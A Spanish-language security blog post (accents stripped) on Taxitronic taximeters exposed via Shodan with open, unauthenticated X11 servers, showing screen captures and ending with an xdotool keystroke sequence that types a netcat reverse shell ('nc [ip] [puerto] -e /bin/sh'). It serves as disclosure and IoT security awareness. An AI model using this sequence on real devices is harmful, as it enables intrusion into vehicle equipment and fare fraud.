Quin a da de hoy an no ha odo hablar del tan conocido y popular IoT (Internet of Things) Internet de las cosas? Los avances tecnolgicos nos favorecen en muchos campos de nuestras vidas, pero todo tiene su parte negativa si no nos tomamos en serio los riesgos de una mala utilizacin y en este caso las consecuencias pueden ser muy negativas. Estamos asistiendo a un cambio en mbito y en escala con la llegada del IoT - o como algunos dicen, el IoE (Internet of Everything) - que har que dentro de 5 o 6 aos prcticamente todos los electrodomsticos en concreto y objetos en general, tengan de serie conectividad con Internet de algn modo u otro. A da de hoy los coches modernos ya traen esta conexin constante va 2G, 3G o 4G y todos nosotros llevamos encima al menos un dispositivo conectado a Internetconstantemente.

Figura 1: Hacking de taxmetros en Espaa va Shodan

Hace ya mas de un ao que se public la primera vulnerabilidad en un automvil que permita el control total del vehculo, y ya son comunes las vulnerabilidades en SmartTV, en dispositivos mviles, frigorficos, lavadoras, cmaras de vigilancia,parqumetros de bicicletas e incluso equipos mdicos para controlar el latido del corazn dentro del cuerpo de las personas. La gran variedad de dispositivos y de plataformas dificulta mucho la correccin de estos fallos de seguridad, porque en muchsimos casos la actualizacin de estos dispositivos no es trivial, no existe o el coste del mismo no permite contar con un ciclo de gestin de la seguridad a largo plazo.

Sin embargo, debemos plantearnos que cuando conectamos algo a Internet est expuesto al mundo entero y que del mismo modo que cuando salimos de casa dejamos la puerta cerrada, en Internet debemos hacer lo mismo con todos los dispositivos que nos unen a la red. Es un trabajo de toda la industria que est involucrada en la evolucin del IoT o iremos descubriendo caso tras caso, como vivimos en un mundo muy inseguro. Y en el mundo de la empresa, a veces los responsables de seguridad no saben ni que existen esos dispositivos, por eso hablamos del famoso Shadow IoT.

Figura 2: Taxmetros de Taxitronic

En este caso os traigo un ejemplo muy llamativo, algunos de los taxmetros que se utilizan en Espaa estn conectados tambin a Internet y no de forma muy segura. En muchos taxis se estn implementando taxmetros con conexin va 3G a Internetpara de esta forma integrarlos con las rutas ms cortas, sistemas de Big Data y distintas aplicaciones mviles que localizan constantemente al vehculo para enviarle de forma directa una nueva peticin de transporte. Sin embargo, una vez ms, la mala configuracin de estos dispositivos puede conllevar que los trayectos de taxi te salgan gratis o al doble de precio, generando un posible problema para el usuario o para el taxista, depende de lo que un posible atacante quiera realizar.

El ejemplo que os voy a poner hoy es el de los Taxmetros 3G de Taxitronic. Basta con leer documentacin de los taxmetros que anuncian en su web para saber que usan un sistema GNU/Linux embebido y con algo ms de documentacin en Internet es fcil descubrir que la distribucin que usan es Pengutronix.

Figura 3: Distribucin Pengutronix sobre la que se basa Taxitronix

Sabiendo la plataforma que usan y que cuentan con conexin a Internet de forma autnoma a cualquiera se le puede pasar por la cabeza hacer un poco de hacking con buscadores e intentar localizar estos dispositivos a travs Shodan para saber qu tienen abierto al mundo. Shodan no es un buscador al uso, es muy peculiar por su forma de proceder; realiza barridos completos al rango IPv4 - en IPv6 se quiere hacer similar con Mr.Looquer - y recogiendo los banners de cada puerto en cada direccin IP, para que mas tarde nosotros podamos hacer bsquedas por esta informacin. En esta caso lo usaremos para buscar por los dispositivos que usan esta plataforma, Pengutronix. Su firma en los banners es "Ptxdist"

Figura 4: Modelos de Taxitronic indexados en Shodan

No todos los taxmetros tienen que aparecer en estos barridos de Shodan, ya que aquellos que se conecten desde detrs de un proxy sin utilizar una direccin IPpblica no aparecern, pero como las redes son complejas y extensas, es fcil dar con taxmetros conectndose va SIM desde ubicaciones en las que no hay un proxyque oculte su software. Como podemos ver en la imagen anterior obtenemos ms de70 resultados y si nos fijamos, la sorpresa es mayscula cuando vemos que tienen el puerto 6000, utilizado por el servicio X11, abierto al exterior.

Figura 5: Puerto 6000 de X Server abierto en distribucin Ptxdist

Tener el servicio X11 abierto significa que hay alguna aplicacin grfica - evidentemente la aplicacin del taxmetro - que est siendo ejecutada en el entorno grfico X de la distribucin Linux. Este sistema es especialmente modular, ya que igual que se est lanzando contra el servidor X local, se podra forzar a lanzar la aplicacin contra un servidor X situado en otra mquina, por ejemplo la mquina de un posible atacante.

El buscador Shodan, desde hace tiempo, no solo se queda en descubrir qu puertos estn abiertos en un determinado servidor, sino que adems implementa algunos clientes para mostrar ms informacin pblica. As, por ejemplo, en el caso de losservidores MongoDB que no solicitan autenticacin, Shodan muestra el nombre y tamao de las bases de datos. En el caso de los servidores VNC sin autenticacin,Shodan muestra un screenshot de la sesin y, por supuesto, en el caso de los servidores X11 sin autenticacin, muestra una captura de lo que se est ejecutando all. En este caso, varios taxmetros de diferentes taxis de Espaa.

Figura 6: Taxmetros indexados en Shodan directamente

Sabiendo esto, podramos saber lo que est apareciendo en la pantalla del taxmetro en todo momento de una forma tan sencilla como conectarnos remotamente cada cierto tiempo al servidor X11 y pedir una captura de pantalla para generar un fichero con la imagen que all se ve. Este es el ejemplo siguiente:

Figura 7: Captura de una sesin de un taxmetro realizada con xwd

En esta caso concreto el taxi estaba libre, pero podemos esperar y realizar capturas cuando el taxi est ocupado como, por ejemplo, en esta ocasin:

Figura 8: Captura hecha con xwd cuando el taxi estaba ocupado

Al igual que podemos tener acceso al display, podemos simular presiones de teclado o movimientos para manejarlo a nuestro gusto. Aunque si pensamos como un malo nuestro inters sera por ejemplo reiniciar el terminal al llegar al destino para que as este marque 0. Esto seria posible con una shell sobre el taxmetro. Como podemos emular las presiones de teclado podemos usar los atajos de teclado:
xdotool key alt+f2 // abrimos un cuadro de dialogo para ejecutar una aplicacin
xdotool key x t e r m // escribimos xterm
xdotool key KP_Enter // presionamos Enter para que se abra la terminal
xdotool key n c space [ip] space [puerto] space minus e space slash b i n slash s h KP_Enter <<< Escribimos en el terminal remoto nc [ip] [puerto] -e /bin/sh
Solo tendramos que conectarnos a esa direccin IP y ese puerto para tener un terminal y ejecutar comandos en el taxmetro. Pero tambin podramos entretenernos poniendo el taxmetro en modo salvapantallas o cosas similares. Pero bastante est mal a da de hoy el mundo del taxi como para que les metan ms problemas encima de los que preocuparse.

Reflexin final

Este ejemplo de los taxmetros, es solo un ejemplo de las repercusiones que tiene el despreocuparse de los dispositivos que tenemos conectados a Internet, a veces parece algo lejano y complejo todo este tipo de situaciones, pero estn ah accesibles a cualquiera y a veces de forma muy sencilla. Todos los implicados en el desarrollo y la evolucin del IoT en nuestra sociedad, deben tomar su parte de responsabilidad, desde el usuario hasta el fabricante, para evitar situaciones indeseables en el futuro con cosas menos banales,
como son los sistemas SCADA.

Saludos,

Autor: Diego Soto
Nota del autor: Algn paso del proceso ha sido omitido para evitar su reproduccin fcilmente

Fuente:
http://www.elladodelmal.com/2016/05/...spana-via.html